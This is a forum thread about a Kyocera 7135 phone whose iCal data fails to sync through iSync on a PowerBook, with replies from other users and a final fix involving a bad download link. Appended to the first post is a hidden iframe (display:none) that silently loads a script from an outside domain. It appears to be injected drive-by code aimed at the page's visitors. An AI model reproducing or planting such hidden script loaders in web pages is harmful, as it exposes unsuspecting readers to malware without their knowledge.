+ Reply to Thread

7135, mac osx, isync, ical?

hello there,
    i just received my 7135 and it is awesome. i am using a powerbook g4. when i sync using palm desktop everything works fine, but when i sync using isync - everything works except it fails when it goes to sync the ical info. is anyone else out there experiencing the same problems.
    thanks
    walt<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No, everything works just fine. I have not done anything special and I'm actually syncing my iPod, .Mac, and my 7135 on every sync function including iCal, AddressBook and quite a few other application conduits.

palm desktop

I don't have the phone yet but maybe it has to do with a conflict between Palm's calendar function and iCal's.

Which calendar program are you actually using?

I still prefer Palm Desktop's interface but the lure of all the features of iCal and Address Book may force me to switch soon.

I use the iCal and AddressBook 100%, even thought I think iCal has a lot more improvements left, it does have some nice features.

i decided to reinstall ical. when i did, i am able to sync my 7135, powerbook and ipod successfully. now my ical unexpectedly quits when i go to open it. well that is a new issue i will work on. at least it is all synching.

I didn't have any problem with ical, isync and the address book.
    Make sure you have the isync conduit installed.
    http://www.apple.com/isync/download/
    Linda

17" powerbook OSX

thanks for the help everybody. it ends up being that apple had a bad link on their webpage for the ical download. they are working on fixing it now.
    -walt